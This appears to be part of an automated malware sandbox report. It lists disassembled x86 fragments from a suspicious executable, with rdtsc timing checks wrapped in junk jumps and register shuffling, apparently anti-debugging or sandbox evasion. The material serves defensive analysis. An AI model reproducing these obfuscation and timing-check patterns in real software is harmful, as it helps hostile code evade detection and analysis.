Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5080165 second address: 50801D1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5BC10A3609h 0x00000008 jmp 00007F5BC10A35FBh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 mov ebx, esi 0x00000017 pushfd 0x00000018 jmp 00007F5BC10A3600h 0x0000001d and cl, 00000068h 0x00000020 jmp 00007F5BC10A35FBh 0x00000025 popfd 0x00000026 popad 0x00000027 push dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F5BC10A3605h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50801D1 second address: 50801D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0B60 second address: 50A0B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A3604h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0B78 second address: 50A0C17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F5BC10B70A6h 0x00000011 push eax 0x00000012 jmp 00007F5BC10B709Bh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 call 00007F5BC10B70A4h 0x0000001e pushad 0x0000001f popad 0x00000020 pop esi 0x00000021 pushfd 0x00000022 jmp 00007F5BC10B70A1h 0x00000027 and ch, 00000066h 0x0000002a jmp 00007F5BC10B70A1h 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007F5BC10B709Eh 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F5BC10B70A7h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0C17 second address: 50A0C1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0707 second address: 50A0732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 call 00007F5BC10B70A3h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5BC10B709Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0732 second address: 50A078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10A35FFh 0x00000009 sbb ecx, 100B95AEh 0x0000000f jmp 00007F5BC10A3609h 0x00000014 popfd 0x00000015 mov eax, 28164237h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [esp], ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5BC10A3609h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A078B second address: 50A07BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F5BC10B709Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5BC10B709Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A07BF second address: 50A07CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A07CE second address: 50A07D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A07D4 second address: 50A07D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A07D8 second address: 50A07DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A063C second address: 50A064C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A35FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A064C second address: 50A0650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0650 second address: 50A0668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5BC10A35FDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0668 second address: 50A0678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B709Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A0461 second address: 50A047B instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5BC10A35FEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A047B second address: 50A048D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B709Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B01BD second address: 50B01C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B01C1 second address: 50B01DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B01DE second address: 50B01FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, cx 0x0000000e push eax 0x0000000f push edx 0x00000010 movzx eax, dx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B01FD second address: 50B023C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5BC10B709Bh 0x00000008 xor ax, 708Eh 0x0000000d jmp 00007F5BC10B70A9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5BC10B709Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50C03D9 second address: 50C03DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50C03DD second address: 50C03E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50C03E3 second address: 50C0466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F5BC10A35FAh 0x0000000b and esi, 747649C8h 0x00000011 jmp 00007F5BC10A35FBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c call 00007F5BC10A3604h 0x00000021 mov cx, CD41h 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a call 00007F5BC10A35FFh 0x0000002f movzx esi, bx 0x00000032 pop edx 0x00000033 call 00007F5BC10A3602h 0x00000038 movzx esi, di 0x0000003b pop ebx 0x0000003c popad 0x0000003d mov eax, dword ptr [ebp+08h] 0x00000040 jmp 00007F5BC10A35FAh 0x00000045 and dword ptr [eax], 00000000h 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50A059F second address: 50A05A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0EF7 second address: 50B0EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0EFB second address: 50B0F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0F01 second address: 50B0F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, ecx 0x0000000d mov edi, esi 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0F20 second address: 50B0F26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50C01C7 second address: 50C021F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5BC10A3606h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edi, esi 0x00000015 pushfd 0x00000016 jmp 00007F5BC10A3608h 0x0000001b add esi, 267BCD48h 0x00000021 jmp 00007F5BC10A35FBh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50C021F second address: 50C024C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5BC10B709Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E0700 second address: 50E0706 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E0706 second address: 50E0739 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b call 00007F5BC10B70A4h 0x00000010 mov bh, ch 0x00000012 pop ebx 0x00000013 mov di, ax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E0739 second address: 50E073F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E073F second address: 50E0754 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 930Eh 0x00000007 mov bx, D21Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov ax, dx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E0754 second address: 50E078B instructions: 0x00000000 rdtsc 0x00000002 mov bx, 836Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F5BC10A3605h 0x0000000d mov dl, ah 0x0000000f pop edi 0x00000010 popad 0x00000011 mov eax, dword ptr [76FB65FCh] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5BC10A35FFh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E078B second address: 50E07A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B70A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E07A3 second address: 50E07A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E07A7 second address: 50E0829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b mov edi, 037BC930h 0x00000010 pushfd 0x00000011 jmp 00007F5BC10B70A9h 0x00000016 or eax, 6DBBB8B6h 0x0000001c jmp 00007F5BC10B70A1h 0x00000021 popfd 0x00000022 popad 0x00000023 je 00007F5C32F0A212h 0x00000029 pushad 0x0000002a push esi 0x0000002b jmp 00007F5BC10B70A3h 0x00000030 pop eax 0x00000031 mov ax, dx 0x00000034 popad 0x00000035 mov ecx, eax 0x00000037 pushad 0x00000038 mov si, di 0x0000003b movsx edx, cx 0x0000003e popad 0x0000003f xor eax, dword ptr [ebp+08h] 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F5BC10B70A0h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E0829 second address: 50E0852 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5BC10A3605h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E0852 second address: 50E08AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10B70A7h 0x00000009 or si, BE0Eh 0x0000000e jmp 00007F5BC10B70A9h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 ror eax, cl 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5BC10B70A9h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E08AE second address: 50E0924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5BC10A35FBh 0x00000013 sbb eax, 0165617Eh 0x00000019 jmp 00007F5BC10A3609h 0x0000001e popfd 0x0000001f mov ch, 4Fh 0x00000021 popad 0x00000022 retn 0004h 0x00000025 nop 0x00000026 mov esi, eax 0x00000028 lea eax, dword ptr [ebp-08h] 0x0000002b xor esi, dword ptr [00322014h] 0x00000031 push eax 0x00000032 push eax 0x00000033 push eax 0x00000034 lea eax, dword ptr [ebp-10h] 0x00000037 push eax 0x00000038 call 00007F5BC5EA3E23h 0x0000003d push FFFFFFFEh 0x0000003f pushad 0x00000040 jmp 00007F5BC10A3609h 0x00000045 mov cx, 3DA7h 0x00000049 popad 0x0000004a pop eax 0x0000004b jmp 00007F5BC10A35FAh 0x00000050 ret 0x00000051 nop 0x00000052 push eax 0x00000053 call 00007F5BC5EA3E49h 0x00000058 mov edi, edi 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d mov dx, 18F0h 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50E0924 second address: 50E0938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B70A0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090011 second address: 5090021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A35FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090021 second address: 5090025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090025 second address: 509005D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F5BC10A35FCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F5BC10A3600h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5BC10A35FAh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 509005D second address: 509006C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 509006C second address: 5090072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090072 second address: 50900B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F5BC10B709Bh 0x00000017 and si, E78Eh 0x0000001c jmp 00007F5BC10B70A9h 0x00000021 popfd 0x00000022 mov di, si 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50900B8 second address: 50900BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50900BE second address: 50900EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F5BC10B709Ch 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50900EC second address: 5090109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090109 second address: 5090119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B709Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090119 second address: 50901AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 jmp 00007F5BC10A3600h 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F5BC10A35FBh 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F5BC10A3604h 0x00000024 jmp 00007F5BC10A3605h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F5BC10A3600h 0x00000030 jmp 00007F5BC10A3605h 0x00000035 popfd 0x00000036 popad 0x00000037 mov ebx, dword ptr [ebp+10h] 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50901AA second address: 50901BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50901BD second address: 50901D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A3604h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50901D5 second address: 5090269 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F5BC10B70A6h 0x00000011 push eax 0x00000012 jmp 00007F5BC10B709Bh 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 mov ax, E28Bh 0x0000001d pushfd 0x0000001e jmp 00007F5BC10B70A0h 0x00000023 adc ax, 1298h 0x00000028 jmp 00007F5BC10B709Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov esi, dword ptr [ebp+08h] 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F5BC10B709Bh 0x0000003b add si, AB5Eh 0x00000040 jmp 00007F5BC10B70A9h 0x00000045 popfd 0x00000046 mov esi, 1F720827h 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090269 second address: 509026F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 509026F second address: 5090273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090273 second address: 50902FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5BC10A3604h 0x00000013 or ax, 21B8h 0x00000018 jmp 00007F5BC10A35FBh 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F5BC10A3604h 0x00000025 xchg eax, edi 0x00000026 pushad 0x00000027 mov eax, 1B9BC8ADh 0x0000002c mov dl, al 0x0000002e popad 0x0000002f test esi, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F5BC10A35FEh 0x0000003a jmp 00007F5BC10A3605h 0x0000003f popfd 0x00000040 movzx eax, di 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50902FE second address: 5090304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090304 second address: 5090308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090308 second address: 5090332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5C32F5539Bh 0x0000000e jmp 00007F5BC10B70A0h 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090332 second address: 5090339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 9Bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 5090339 second address: 50903B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10B709Bh 0x00000009 add ax, 284Eh 0x0000000e jmp 00007F5BC10B70A9h 0x00000013 popfd 0x00000014 mov bx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F5C32F55354h 0x00000020 pushad 0x00000021 mov esi, 5910FF4Fh 0x00000026 pushfd 0x00000027 jmp 00007F5BC10B70A4h 0x0000002c jmp 00007F5BC10B70A5h 0x00000031 popfd 0x00000032 popad 0x00000033 mov edx, dword ptr [esi+44h] 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F5BC10B709Dh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50903B7 second address: 5090469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F5BC10A35FEh 0x00000011 test edx, 61000000h 0x00000017 pushad 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F5BC10A35FCh 0x0000001f xor ax, 3BE8h 0x00000024 jmp 00007F5BC10A35FBh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F5BC10A3608h 0x00000030 xor ch, 00000048h 0x00000033 jmp 00007F5BC10A35FBh 0x00000038 popfd 0x00000039 popad 0x0000003a jmp 00007F5BC10A3608h 0x0000003f popad 0x00000040 jne 00007F5C32F41839h 0x00000046 pushad 0x00000047 mov ebx, eax 0x00000049 call 00007F5BC10A35FAh 0x0000004e mov ecx, 2AA2D331h 0x00000053 pop ecx 0x00000054 popad 0x00000055 test byte ptr [esi+48h], 00000001h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
